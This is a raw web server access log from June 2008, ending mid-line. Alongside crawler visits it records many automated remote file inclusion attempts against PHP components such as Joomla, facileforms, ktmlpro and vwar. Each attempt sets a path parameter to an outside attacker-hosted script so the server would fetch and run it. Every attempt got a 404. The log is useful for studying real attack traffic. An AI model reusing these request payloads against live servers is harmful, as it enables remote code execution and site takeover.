74.6.8.113 - - [25/Jun/2008:01:02:17 -0500] "GET /logs/access_log.1198972800 HTTP/1.0" 200 179327 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.16.235 - - [25/Jun/2008:01:09:10 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.46 - - [25/Jun/2008:01:09:10 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.35.33.82 - - [25/Jun/2008:01:12:42 -0500] "GET /logs/access_log.1207785600/index.php?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
200.35.33.82 - - [25/Jun/2008:01:12:44 -0500] "GET /index.php?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.35.33.82 - - [25/Jun/2008:01:12:45 -0500] "GET /logs/index.php?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
200.49.145.16 - - [25/Jun/2008:01:25:36 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
200.49.145.16 - - [25/Jun/2008:01:25:37 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
206.212.247.135 - - [25/Jun/2008:01:26:34 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
206.212.247.135 - - [25/Jun/2008:01:26:34 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
200.203.122.236 - - [25/Jun/2008:01:30:24 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
200.203.122.236 - - [25/Jun/2008:01:30:27 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
82.208.32.7 - - [25/Jun/2008:01:33:24 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
82.208.32.7 - - [25/Jun/2008:01:33:24 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
82.208.32.7 - - [25/Jun/2008:01:33:24 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
82.208.32.7 - - [25/Jun/2008:01:33:24 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
208.111.154.15 - - [25/Jun/2008:01:35:46 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [25/Jun/2008:01:35:46 -0500] "GET /artwork/hospitals.htm HTTP/1.0" 200 3315 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
200.203.122.236 - - [25/Jun/2008:01:39:51 -0500] "GET /logs/access_log.1207785600//modules/Neos_Chronos/header.php?base_folder=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
200.203.122.236 - - [25/Jun/2008:01:39:51 -0500] "GET /logs/access_log.1207785600//modules/Neos_Chronos/header.php?base_folder=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
200.203.122.236 - - [25/Jun/2008:01:39:54 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
200.203.122.236 - - [25/Jun/2008:01:39:55 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
200.203.122.236 - - [25/Jun/2008:01:39:58 -0500] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.203.122.236 - - [25/Jun/2008:01:40:00 -0500] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
82.208.32.7 - - [25/Jun/2008:01:41:05 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
82.208.32.7 - - [25/Jun/2008:01:41:06 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
82.208.32.7 - - [25/Jun/2008:01:42:57 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
82.208.32.7 - - [25/Jun/2008:01:42:58 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tnwnepal.org/kang.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.20.61.23 - - [25/Jun/2008:01:59:37 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 312 "-""libwww-perl/5.53"
69.20.61.23 - - [25/Jun/2008:01:59:37 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 307 "-""libwww-perl/5.53"
217.148.95.147 - - [25/Jun/2008:02:01:46 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 352 "-""libwww-perl/5.76"
217.148.95.147 - - [25/Jun/2008:02:01:46 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 347 "-""libwww-perl/5.76"
72.29.81.233 - - [25/Jun/2008:02:03:05 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 352 "-""libwww-perl/5.811"
72.29.81.233 - - [25/Jun/2008:02:03:05 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 347 "-""libwww-perl/5.811"
74.6.8.113 - - [25/Jun/2008:02:03:51 -0500] "GET /logs/access_log.1212624000 HTTP/1.0" 200 366211 "-""Mozilla/5.0 (compatible